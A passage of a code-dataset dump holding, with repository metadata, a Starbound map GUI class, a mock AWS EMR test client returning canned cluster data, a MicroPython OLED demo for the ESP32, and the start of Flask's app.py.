] | permissive | txxia/starbound-map | d5eac43add27076703a7918f574a32807b258f37 | a0231cbc0d14aed072246061280084bb7eaf5d04 | refs/heads/master | 2023-07-19T20:05:10.729118 | 2019-08-08T01:19:10 | 2019-08-08T01:19:29 | 136,258,912 | 14 | 0 | MIT | 2023-07-16T23:45:16 | 2018-06-06T02:13:12 | Python | UTF-8 | Python | false | false | 1,906 | py | import glfw
from gui.core import *
from gui.widgets.job_overlay import JobOverlay
from gui.windows.about import AboutWindow
from gui.windows.mapcontrol import MapControllerWindow
from gui.windows.mapview import MapWindow
from gui.windows.usage import UsageWindow
from map.renderer import WorldRenderer
class StarboundMap(GUIElement):
def __init__(self, world_renderer: WorldRenderer):
state = GUIState(root=self)
super().__init__(state)
self.set_styles()
self.add_child(MapWindow(self.state, renderer=world_renderer))
self.add_child(MapControllerWindow(self.state))
self.add_child(UsageWindow(self.state))
self.add_child(AboutWindow(self.state))
self.add_child(JobOverlay(self.state))
def gui(self):
imgui.new_frame()
self.show_menu_bar()
self.state.render_params.time_in_seconds = glfw.get_time() # TODO remove glfw calls
for child in self.children:
child.gui()
# imgui.show_test_window()
# self.show_debug_window()
imgui.render()
def show_menu_bar(self):
if imgui.begin_main_menu_bar():
if imgui.begin_menu("Help"):
if imgui.menu_item("User Guide")[0]:
self.send_event(GUIEventType.OPEN_WINDOW, arg=WindowName.USER_GUIDE)
if imgui.menu_item("About")[0]:
self.send_event(GUIEventType.OPEN_WINDOW, arg=WindowName.ABOUT)
imgui.end_menu()
imgui.end_main_menu_bar()
def show_debug_window(self):
imgui.label_text("time", '{:.1f}'.format(glfw.get_time()))
imgui.label_text("fps", '{:.1f}'.format(self.io.framerate))
imgui.label_text("mouse", '{:.1f}, {:.1f}'.format(self.io.mouse_pos.x,
self.io.mouse_pos.y))
def set_styles(self):
pass
| [
"[email protected]"
] | |
3e563019b3d7db6d3ec9a95f54d4b81a39d0a957 | 121ae77d5a4410d1a74c4d2abb35910fc1ee501c | /tests/mock_emr.py | 988e8644763eee5ca08f517ccd3d29d747429469 | [
"MIT"
] | permissive | warrenronsiek/emrcli | 6baee85a27c3106cc55ca31feccfb804f6c3d17c | 0874ae40be480e9f274867bc526fb6757b3db51e | refs/heads/master | 2020-08-02T23:01:45.357969 | 2019-05-10T19:24:55 | 2019-05-10T19:24:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,895 | py | from datetime import datetime
def mock_emr_client(*args, **kwargs):
class TestEmrClient:
@classmethod
def run_job_flow(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0}, "JobFlowId": "s-SNGBtA88"}
@classmethod
def terminate_job_flows(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0}}
@classmethod
def describe_cluster(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'Cluster': {
'Id': 's-SNGBtA88l',
'Name': 'test_cluster',
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'InstanceCollectionType': 'INSTANCE_GROUP',
'MasterPublicDnsName': 'ip-10-22-182-88',
}
}
@classmethod
def list_instance_fleets(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'InstanceFleets': [
{
'Id': 'id1',
'Name': 'Master',
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'InstanceFleetType': 'MASTER',
'TargetOnDemandCapacity': 1,
'ProvisionedOnDemandCapacity': 1,
'InstanceTypeSpecifications': [
{
'InstanceType': 'm4.4xlarge',
'WeightedCapacity': 100,
'BidPrice': '0.40',
'BidPriceAsPercentageOfOnDemandPrice': 100.0,
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
'EbsOptimized': True | False
},
],
'LaunchSpecifications': {
'SpotSpecification': {
'TimeoutDurationMinutes': 5,
'TimeoutAction': 'SWITCH_TO_ON_DEMAND',
'BlockDurationMinutes': 120
}
}
},
{
'Id': 'id2',
'Name': 'Core',
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'InstanceFleetType': 'CORE',
'TargetSpotCapacity': 2,
'ProvisionedSpotCapacity': 2,
'InstanceTypeSpecifications': [
{
'InstanceType': 'm4.4xlarge',
'WeightedCapacity': 100,
'BidPrice': '0.40',
'BidPriceAsPercentageOfOnDemandPrice': 100.0,
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
'EbsOptimized': True | False
},
],
'LaunchSpecifications': {
'SpotSpecification': {
'TimeoutDurationMinutes': 5,
'TimeoutAction': 'SWITCH_TO_ON_DEMAND',
'BlockDurationMinutes': 120
}
}
}
]
}
@classmethod
def list_instance_groups(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'InstanceGroups': [
{
'Id': 'id1',
'Name': 'Master',
'Market': 'ON_DEMAND',
'InstanceGroupType': 'MASTER',
'InstanceType': 'm4.4xlarge',
'RequestedInstanceCount': 1,
'RunningInstanceCount': 1,
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
'EbsOptimized': False,
},
{
'Id': 'id2',
'Name': 'Core',
'Market': 'SPOT',
'InstanceGroupType': 'CORE',
'BidPrice': '0.40',
'InstanceType': 'm4.4xlarge',
'RequestedInstanceCount': 2,
'RunningInstanceCount': 2,
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
'EbsOptimized': False,
},
]
}
@classmethod
def add_job_flow_steps(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'StepIds': [
'stepId1',
'stepId2'
]
}
@classmethod
def list_instances(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'Instances': [
{'Id': 'ci-3SC4IQXMO1PSK',
'Ec2InstanceId': 'i-0576b968542bb508f',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-183-7.ec2.internal',
'PrivateIpAddress': '11.225.183.7',
'Status': {'State': 'TERMINATED',
'StateChangeReason': {'Code': 'INTERNAL_ERROR',
'Message': 'Startup script failed.'},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9, 10),
'EndDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-035e6d6d63fd5b244'}]},
{'Id': 'ci-31W8Z97DPKISH',
'Ec2InstanceId': 'i-0f8a49595746000c6',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-181-246.ec2.internal',
'PrivateIpAddress': '11.225.181.246',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-024a827a0dfb1f020'}]},
{'Id': 'ci-LALR90A040LE',
'Ec2InstanceId': 'i-010785f4cc01291c6',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-182-177.ec2.internal',
'PrivateIpAddress': '11.225.182.177',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9, 10),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-0dfa83f26dba6d166'}]},
{'Id': 'ci-7EGA48KCGEPB',
'Ec2InstanceId': 'i-00165a7vv705de729',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-183-233.ec2.internal',
'PrivateIpAddress': '11.225.183.233',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-0fad27754481ed35f'}]},
{'Id': 'ci-2HFLSDMDWGQTO',
'Ec2InstanceId': 'i-0217e49225744ce71',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-180-81.ec2.internal',
'PrivateIpAddress': '11.225.180.81',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-00c62a333a2e2bbcf'}]},
{'Id': 'ci-26MIX2MMXOOY7',
'Ec2InstanceId': 'i-0938b90515b0b8adf',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-182-250.ec2.internal',
'PrivateIpAddress': '11.225.182.250',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {
'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3FR4STYY3V56R',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-051e3cb1c47348904'}]},
{'Id': 'ci-29QIUQ3NYBVG6',
'Ec2InstanceId': 'i-011513d5f9721926b',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-181-179.ec2.internal',
'PrivateIpAddress': '11.225.181.179',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-090f8c3caac1a9ca4'}]}]
}
emr_client = TestEmrClient()
return emr_client
| [
"[email protected]"
] | |
10e96bc785ac19c2efd851c350ebe01d79ef24e4 | 7cc57bb8bf0f7219e2ed0b05fadc271a7b20bf0e | /DEVKITv1/oled/main.py | 39341702169b799949baca2e15570e1b7d4e837e | [] | no_license | cloudymike/micropythonexamples | 3bc03bccc1d3056f81e4d254b3f7a159648d85f1 | 953531451d89fb20ff81ceeef74d8bae6db3d4f3 | refs/heads/master | 2023-08-19T01:50:23.763464 | 2023-08-07T15:52:54 | 2023-08-07T15:52:54 | 200,582,793 | 0 | 2 | null | 2023-09-14T02:32:25 | 2019-08-05T04:35:00 | Python | UTF-8 | Python | false | false | 1,128 | py | # Complete project details at https://RandomNerdTutorials.com
from machine import Pin, I2C
import ssd1306
from time import sleep
import os
from time import sleep_ms
import gfx
import bignumber
# ESP32 Pin assignment
i2c = I2C(-1, scl=Pin(22), sda=Pin(21))
# ESP8266 Pin assignment
#i2c = I2C(-1, scl=Pin(5), sda=Pin(24))
# Reset OLED
oledReset=Pin(16, Pin.OUT)
oledReset.value(0)
sleep_ms(500)
oledReset.value(1)
oled_width = 128
oled_height = 64
oled = ssd1306.SSD1306_I2C(oled_width, oled_height, i2c)
oled.text('Hello, World 1!', 0, 0)
oled.text('Hello, World 2!', 0, 10)
oled.text('Hello, World 3!', 0, 20)
oled.show()
sleep_ms(1000)
oled.fill(0)
graphics = gfx.GFX(oled_width, oled_height, oled.pixel)
graphics.fill_circle(64, 16, 16, 1)
oled.show()
sleep_ms(1000)
oled.fill(1)
oled.show()
sleep_ms(1000)
for number in range(15):
oled.fill(0)
bignumber.bigNumber(oled, number)
oled.show()
sleep_ms(10)
oled.fill(0)
bignumber.bigTemp(oled, 14.6, 'F')
oled.show()
sleep_ms(1000)
oled.fill(0)
oled.text('The end!', 60, 49)
oled.show()
| [
"[email protected]"
] | |
530008283c1d95b2bbd68b84c9530f2593eceb96 | 5de718a2ab00460f59621e1e3c100b37c0853f61 | /env/Lib/site-packages/flask/app.py | b321c63f7c4bba6de67231bffec304fc04d9759d | [] | no_license | HenryVo31/Connect | 3fd60d893edd1199663878b7b68505e57a410dd6 | 3783e5b4d6b58f19e37ccff66501cb78c35c1500 | refs/heads/master | 2023-02-13T14:21:12.692446 | 2021-01-08T21:40:16 | 2021-01-08T21:40:16 | 295,485,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97,137 | py | # -*- coding: utf-8 -*-
"""
flask.app
~~~~~~~~~
This module implements the central WSGI application object.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import warnings
from datetime import timedelta
from functools import update_wrapper
from itertools import chain
from threading import Lock
from werkzeug.datastructures import Headers, ImmutableDict
from werkzeug.exceptions import BadRequest, BadRequestKeyError, HTTPException, \
InternalServerError, MethodNotAllowed, default_exceptions
from werkzeug.routing import BuildError, Map, RequestRedirect, \
RoutingException, Rule
from . import cli, json
from ._compat import integer_types, reraise, string_types, text_type
from .config import Config, ConfigAttribute
from .ctx import AppContext, RequestContext, _AppCtxGlobals
from .globals import _request_ctx_stack, g, request, session
from .helpers import (
_PackageBoundObject,
_endpoint_from_view_func, find_package, get_env, get_debug_flag,
get_flashed_messages, locked_cached_property, url_for, get_load_dotenv
)
from .logging import create_logger
from .sessions import SecureCookieSessionInterface
from .signals import appcontext_tearing_down, got_request_exception, \
request_finished, request_started, request_tearing_down
from .templating import DispatchingJinjaLoader, Environment, \
_default_template_ctx_processor
from .wrappers import Request, Response
# a singleton sentinel value for parameter defaults
_sentinel = object()
def _make_timedelta(value):
if not isinstance(value, timedelta):
return timedelta(seconds=value)
return value
def setupmethod(f):
"""Wraps a method so that it performs a check in debug mode if the
first request was already handled.
"""
def wrapper_func(self, *args, **kwargs):
if self.debug and self._got_first_request:
raise AssertionError('A setup function was called after the '
'first request was handled. This usually indicates a bug '
'in the application where a module was not imported '
'and decorators or other functionality was called too late.\n'
'To fix this make sure to import all your view modules, '
'database models and everything related at a central place '
'before the application starts serving requests.')
return f(self, *args, **kwargs)
return update_wrapper(wrapper_func, f)
class Flask(_PackageBoundObject):
"""The flask object implements a WSGI application and acts as the central
object. It is passed the name of the module or package of the
application. Once it is created it will act as a central registry for
the view functions, the URL rules, template configuration and much more.
The name of the package is used to resolve resources from inside the
package or the folder the module is contained in depending on if the
package parameter resolves to an actual python package (a folder with
an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file).
For more information about resource loading, see :func:`open_resource`.
Usually you create a :class:`Flask` instance in your main module or
in the :file:`__init__.py` file of your package like this::
from flask import Flask
app = Flask(__name__)
.. admonition:: About the First Parameter
The idea of the first parameter is to give Flask an idea of what
belongs to your application. This name is used to find resources
on the filesystem, can be used by extensions to improve debugging
information and a lot more.
So it's important what you provide there. If you are using a single
module, `__name__` is always the correct value. If you however are
using a package, it's usually recommended to hardcode the name of
your package there.
For example if your application is defined in :file:`yourapplication/app.py`
you should create it with one of the two versions below::
app = Flask('yourapplication')
app = Flask(__name__.split('.')[0])
Why is that? The application will work even with `__name__`, thanks
to how resources are looked up. However it will make debugging more
painful. Certain extensions can make assumptions based on the
import name of your application. For example the Flask-SQLAlchemy
extension will look for the code in your application that triggered
an SQL query in debug mode. If the import name is not properly set
up, that debugging information is lost. (For example it would only
pick up SQL queries in `yourapplication.app` and not
`yourapplication.views.frontend`)
.. versionadded:: 0.7
The `static_url_path`, `static_folder`, and `template_folder`
parameters were added.
.. versionadded:: 0.8
The `instance_path` and `instance_relative_config` parameters were
added.
.. versionadded:: 0.11
The `root_path` parameter was added.
.. versionadded:: 1.0
The ``host_matching`` and ``static_host`` parameters were added.
.. versionadded:: 1.0
The ``subdomain_matching`` parameter was added. Subdomain
matching needs to be enabled manually now. Setting
:data:`SERVER_NAME` does not implicitly enable it.
:param import_name: the name of the application package
:param static_url_path: can be used to specify a different path for the
static files on the web. Defaults to the name
of the `static_folder` folder.
:param static_folder: the folder with static files that should be served
at `static_url_path`. Defaults to the ``'static'``
folder in the root path of the application.
:param static_host: the host to use when adding the static route.
Defaults to None. Required when using ``host_matching=True``
with a ``static_folder`` configured.
:param host_matching: set ``url_map.host_matching`` attribute.
Defaults to False.
:param subdomain_matching: consider the subdomain relative to
:data:`SERVER_NAME` when matching routes. Defaults to False.
:param template_folder: the folder that contains the templates that should
be used by the application. Defaults to
``'templates'`` folder in the root path of the
application.
:param instance_path: An alternative instance path for the application.
By default the folder ``'instance'`` next to the
package or module is assumed to be the instance
path.
:param instance_relative_config: if set to ``True`` relative filenames
for loading the config are assumed to
be relative to the instance path instead
of the application root.
:param root_path: Flask by default will automatically calculate the path
to the root of the application. In certain situations
this cannot be achieved (for instance if the package
is a Python 3 namespace package) and needs to be
manually defined.
"""
#: The class that is used for request objects. See :class:`~flask.Request`
#: for more information.
request_class = Request
#: The class that is used for response objects. See
#: :class:`~flask.Response` for more information.
response_class = Response
#: The class that is used for the Jinja environment.
#:
#: .. versionadded:: 0.11
jinja_environment = Environment
#: The class that is used for the :data:`~flask.g` instance.
#:
#: Example use cases for a custom class:
#:
#: 1. Store arbitrary attributes on flask.g.
#: 2. Add a property for lazy per-request database connectors.
#: 3. Return None instead of AttributeError on unexpected attributes.
#: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g.
#:
#: In Flask 0.9 this property was called `request_globals_class` but it
#: was changed in 0.10 to :attr:`app_ctx_globals_class` because the
#: flask.g object is now application context scoped.
#:
#: .. versionadded:: 0.10
app_ctx_globals_class = _AppCtxGlobals
#: The class that is used for the ``config`` attribute of this app.
#: Defaults to :class:`~flask.Config`.
#:
#: Example use cases for a custom class:
#:
#: 1. Default values for certain config options.
#: 2. Access to config values through attributes in addition to keys.
#:
#: .. versionadded:: 0.11
config_class = Config
#: The testing flag. Set this to ``True`` to enable the test mode of
#: Flask extensions (and in the future probably also Flask itself).
#: For example this might activate test helpers that have an
#: additional runtime cost which should not be enabled by default.
#:
#: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the
#: default it's implicitly enabled.
#:
#: This attribute can also be configured from the config with the
#: ``TESTING`` configuration key. Defaults to ``False``.
testing = ConfigAttribute('TESTING')
#: If a secret key is set, cryptographic components can use this to
#: sign cookies and other things. Set this to a complex random value
#: when you want to use the secure cookie for instance.
#:
#: This attribute can also be configured from the config with the
#: :data:`SECRET_KEY` configuration key. Defaults to ``None``.
secret_key = ConfigAttribute('SECRET_KEY')
#: The secure cookie uses this for the name of the session cookie.
#:
#: This attribute can also be configured from the config with the
#: ``SESSION_COOKIE_NAME`` configuration key. Defaults to ``'session'``
session_cookie_name = ConfigAttribute('SESSION_COOKIE_NAME')
#: A :class:`~datetime.timedelta` which is used to set the expiration
#: date of a permanent session. The default is 31 days which makes a
#: permanent session survive for roughly one month.
#:
#: This attribute can also be configured from the config with the
#: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to
#: ``timedelta(days=31)``
permanent_session_lifetime = ConfigAttribute('PERMANENT_SESSION_LIFETIME',
get_converter=_make_timedelta)
#: A :class:`~datetime.timedelta` which is used as default cache_timeout
#: for the :func:`send_file` functions. The default is 12 hours.
#:
#: This attribute can also be configured from the config with the
#: ``SEND_FILE_MAX_AGE_DEFAULT`` configuration key. This configuration
#: variable can also be set with an integer value used as seconds.
#: Defaults to ``timedelta(hours=12)``
send_file_max_age_default = ConfigAttribute('SEND_FILE_MAX_AGE_DEFAULT',
get_converter=_make_timedelta)
#: Enable this if you want to use the X-Sendfile feature. Keep in
#: mind that the server has to support this. This only affects files
#: sent with the :func:`send_file` method.
#:
#: .. versionadded:: 0.2
#:
#: This attribute can also be configured from the config with the
#: ``USE_X_SENDFILE`` configuration key. Defaults to ``False``.
use_x_sendfile = ConfigAttribute('USE_X_SENDFILE')
#: The JSON encoder class to use. Defaults to :class:`~flask.json.JSONEncoder`.
#:
#: .. versionadded:: 0.10
json_encoder = json.JSONEncoder
#: The JSON decoder class to use. Defaults to :class:`~flask.json.JSONDecoder`.
#:
#: .. versionadded:: 0.10
json_decoder = json.JSONDecoder
#: Options that are passed directly to the Jinja2 environment.
jinja_options = ImmutableDict(
extensions=['jinja2.ext.autoescape', 'jinja2.ext.with_']
)
#: Default configuration parameters.
default_config = ImmutableDict({
'ENV': None,
'DEBUG': None,
'TESTING': False,
'PROPAGATE_EXCEPTIONS': None,
'PRESERVE_CONTEXT_ON_EXCEPTION': None,
'SECRET_KEY': None,
'PERMANENT_SESSION_LIFETIME': timedelta(days=31),
'USE_X_SENDFILE': False,
'SERVER_NAME': None,
'APPLICATION_ROOT': '/',
'SESSION_COOKIE_NAME': 'session',
'SESSION_COOKIE_DOMAIN': None,
'SESSION_COOKIE_PATH': None,
'SESSION_COOKIE_HTTPONLY': True,
'SESSION_COOKIE_SECURE': False,
'SESSION_COOKIE_SAMESITE': None,
'SESSION_REFRESH_EACH_REQUEST': True,
'MAX_CONTENT_LENGTH': None,
'SEND_FILE_MAX_AGE_DEFAULT': timedelta(hours=12),
'TRAP_BAD_REQUEST_ERRORS': None,
'TRAP_HTTP_EXCEPTIONS': False,
'EXPLAIN_TEMPLATE_LOADING': False,
'PREFERRED_URL_SCHEME': 'http',
'JSON_AS_ASCII': True,
'JSON_SORT_KEYS': True,
'JSONIFY_PRETTYPRINT_REGULAR': False,
'JSONIFY_MIMETYPE': 'application/json',
'TEMPLATES_AUTO_RELOAD': None,
'MAX_COOKIE_SIZE': 4093,
})
#: The rule object to use for URL rules created. This is used by
#: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`.
#:
#: .. versionadded:: 0.7
url_rule_class = Rule
#: the test client that is used with when `test_client` is used.
#:
#: .. versionadded:: 0.7
test_client_class = None
#: The :class:`~click.testing.CliRunner` subclass, by default
#: :class:`~flask.testing.FlaskCliRunner` that is used by
#: :meth:`test_cli_runner`. Its ``__init__`` method should take a
#: Flask app object as the first argument.
#:
#: .. versionadded:: 1.0
test_cli_runner_class = None
#: the session interface to use. By default an instance of
#: :class:`~flask.sessions.SecureCookieSessionInterface` is used here.
#:
#: .. versionadded:: 0.8
session_interface = SecureCookieSessionInterface()
# TODO remove the next three attrs when Sphinx :inherited-members: works
# https://github.com/sphinx-doc/sphinx/issues/741
#: The name of the package or module that this app belongs to. Do not
#: change this once it is set by the constructor.
import_name = None
#: Location of the template files to be added to the template lookup.
#: ``None`` if templates should not be added.
template_folder = None
#: Absolute path to the package on the filesystem. Used to look up
#: resources contained in the package.
root_path = None
def __init__(
self,
import_name,
static_url_path=None,
static_folder='static',
static_host=None,
host_matching=False,
subdomain_matching=False,
template_folder='templates',
instance_path=None,
instance_relative_config=False,
root_path=None
):
_PackageBoundObject.__init__(
self,
import_name,
template_folder=template_folder,
root_path=root_path
)
if static_url_path is not None:
self.static_url_path = static_url_path
if static_folder is not None:
self.static_folder = static_folder
if instance_path is None:
instance_path = self.auto_find_instance_path()
elif not os.path.isabs(instance_path):
raise ValueError(
'If an instance path is provided it must be absolute.'
' A relative path was given instead.'
)
#: Holds the path to the instance folder.
#:
#: .. versionadded:: 0.8
self.instance_path = instance_path
#: The configuration dictionary as :class:`Config`. This behaves
#: exactly like a regular dictionary but supports additional methods
#: to load a config from files.
self.config = self.make_config(instance_relative_config)
#: A dictionary of all view functions registered. The keys will
#: be function names which are also used to generate URLs and
#: the values are the function objects themselves.
#: To register a view function, use the :meth:`route` decorator.
self.view_functions = {}
#: A dictionary of all registered error handlers. The key is ``None``
#: for error handlers active on the application, otherwise the key is
#: the name of the blueprint. Each key points to another dictionary
#: where the key is the status code of the http exception. The
#: special key ``None`` points to a list of tuples where the first item
#: is the class for the instance check and the second the error handler
#: function.
#:
#: To register an error handler, use the :meth:`errorhandler`
#: decorator.
self.error_handler_spec = {}
#: A list of functions that are called when :meth:`url_for` raises a
#: :exc:`~werkzeug.routing.BuildError`. Each function registered here
#: is called with `error`, `endpoint` and `values`. If a function
#: returns ``None`` or raises a :exc:`BuildError` the next function is
#: tried.
#:
#: .. versionadded:: 0.9
self.url_build_error_handlers = []
#: A dictionary with lists of functions that will be called at the
#: beginning of each request. The key of the dictionary is the name of
#: the blueprint this function is active for, or ``None`` for all
#: requests. To register a function, use the :meth:`before_request`
#: decorator.
self.before_request_funcs = {}
#: A list of functions that will be called at the beginning of the
#: first request to this instance. To register a function, use the
#: :meth:`before_first_request` decorator.
#:
#: .. versionadded:: 0.8
self.before_first_request_funcs = []
#: A dictionary with lists of functions that should be called after
#: each request. The key of the dictionary is the name of the blueprint
#: this function is active for, ``None`` for all requests. This can for
#: example be used to close database connections. To register a function
#: here, use the :meth:`after_request` decorator.
self.after_request_funcs = {}
#: A dictionary with lists of functions that are called after
#: each request, even if an exception has occurred. The key of the
#: dictionary is the name of the blueprint this function is active for,
#: ``None`` for all requests. These functions are not allowed to modify
